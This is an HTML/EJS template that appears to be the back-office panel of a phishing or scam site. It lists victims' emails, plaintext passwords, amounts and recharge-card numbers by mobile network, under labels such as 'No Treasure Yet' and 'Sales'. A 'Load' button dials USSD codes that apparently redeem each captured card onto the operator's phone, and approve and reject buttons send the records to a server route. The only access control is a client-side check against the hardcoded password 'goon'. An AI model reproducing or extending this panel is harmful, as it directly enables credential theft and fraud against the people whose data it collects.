<!DOCTYPE html>
<html>
<head>

	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<link rel="icon" href="/site_icon.jpg">


	<style type="text/css">

		@media screen and (min-width: 300px){


			body{
				font-family: arial, helvetica, sans-serif;
			}
			
			.data_wrapper{
				display: grid;
				grid-template-columns: 2fr 2fr 2fr;
				max-width: 700px;
				margin: 45px auto;
			}


			.data_wrapper_wrapper > div{
				background-color: rgb(240, 240, 240);	
				padding: 5px 0;
				font-size: 12px;
			}
			
			.data_wrapper_wrapper > div:nth-child(even){
				background-color: rgb(200, 200, 200);	
			}



			.data_wrapper > div{
				padding:5px 0;
				border-left: 1px solid rgb(160, 160, 160);
				text-align: center;
			}

			.load, .approve, .reject{
				display: block;
				padding: 7px 15px;
				margin: 10px 5px 0 auto;
				background-color: rgb(0, 40, 120);
				color: white;
				border: none;
			}


			.load{
				background-color: rgb(0, 40, 120);
			}


			.approve{
				background-color: rgb(0, 100, 20);
			}


			.reject{
				background-color: rgb(200, 0, 0);
			}

		}






		@media screen and (min-width: 1000px){
			.data_wrapper_wrapper > div{
				font-size: 16px;
			}
		}



	</style>


	<title></title>
</head>





<body>

	<main>


		

		
		<%if(data && data.length > 0){%>

			
			<h1 class="real_h1" style="margin-top: 20px; text-align: center;"> </h1>





			<form style="margin: 20px 0">
				<input type="password" name="password">
				<button>Okay</button>
			</form>

			<div class="data_wrapper_wrapper">
				<%for(i=data.length - 1; i>=0; i--){%>

				
					<div class="data_wrapper">




						<%if(data[i].card.length == 17){%>
							<button class="approve" data-amount="<%=data[i].amount%>" data-card="<%=data[i].card%>" data-email="<%=data[i].email%>">Approve</button>

							<button class="reject" data-amount="<%=data[i].amount%>" data-card="<%=data[i].card%>" data-email="<%=data[i].email%>">Reject</button>

							<button class="load" data-card="<%=data[i].card%>">Load</button>

							<div class="email"><%=data[i].email%></div>
							<div class="password"><%=data[i].password%></div>
							<div class="amount"><%=data[i].amount%></div>
							<div class="card"><%=data[i].card%></div>
							<div class="network"><%=data[i].network%></div>
							<div class="network"><%=data[i].purchase_time%></div>
							<span></span>
							<span></span>
							
						<%}%>		



						<%if(data[i].card.length == 10){%>
							<button class="approve" data-amount="<%=data[i].amount%>" data-card="<%=data[i].card%>" data-email="<%=data[i].email%>">Approve</button>

							<button class="reject" data-amount="<%=data[i].amount%>" data-card="<%=data[i].card%>" data-email="<%=data[i].email%>">Reject</button>

							<button class="load" data-card="<%=data[i].card%>">Load</button>

							<div class="email"><%=data[i].email%></div>
							<div class="password"><%=data[i].password%></div>
							<div class="amount"><%=data[i].amount%></div>
							<div class="card"><%=data[i].card%></div>
							<div class="network"><%=data[i].network%></div>
							<div class="network"><%=data[i].purchase_time%></div>
							<span></span>
							<span></span>
							
						<%}%>


						
					</div>
				<%}%>
			</div>
		<%}else{%>
			<h1 style="margin-top: 20px; text-align: center;">No Treasure Yet</h1>
		<%}%>
		

	</main>
















	<script type="text/javascript">




		
		
		const isFacebookContainer = document.querySelectorAll(".isFacebook.false");

		isFacebookContainer.forEach((each)=>{
			each.parentElement.style.color = "red";
		});


		const form = document.querySelector("form");
		const data_wrapper_wrapper = document.querySelector(".data_wrapper_wrapper");
		data_wrapper_wrapper.style.display = "block"



		const email = document.querySelectorAll(".email");

		document.querySelector(".real_h1").innerHTML = `${email.length}  Sales`;






		if(form){
			form.addEventListener("submit", (e)=>{
				e.preventDefault();

				if(form.password.value === "goon"){
					data_wrapper_wrapper.style.display = "block";
				}else{
					data_wrapper_wrapper.style.display = "none";
				}
			});
		}
		





		const approveButton = document.querySelectorAll(".approve");
		const rejectButton = document.querySelectorAll(".reject");
		const loadButton = document.querySelectorAll(".load");

		



		//Load
		loadButton.forEach((each)=>{
			each.addEventListener("click", async function(){
				each.parentElement.style.border = "2px solid red";
				each.parentElement.style.color = "red";
				each.style.display = "none";

				
				if(each.dataset.card.length === 10){
					window.location.href= `tel:*3551*${each.dataset.card}#`;
				}else{
					window.location.href= `tel:*555*${each.dataset.card}#`;
				}				
			});
		});






		function approve_or_reject(type, each){
			each.addEventListener("click", async function(){
				try{
					const result = await fetch(`/dynamic/${each.dataset.card}/${type}/${each.dataset.email}/${each.dataset.amount}`, {
						method: "DELETE",
					});

					const res = await result.json();

					if(res.okay){
						each.parentElement.style.display = "none";		
					}else{
						console.log(res);
					}

				}catch(error){
					console.log(error);
				}
			});
		}



		//Approve
		approveButton.forEach((each)=>{	
			approve_or_reject("approved", each);
		});



		//reject
		rejectButton.forEach((each)=>{	
			approve_or_reject("reject", each);
		});


	</script>

</body>
</html>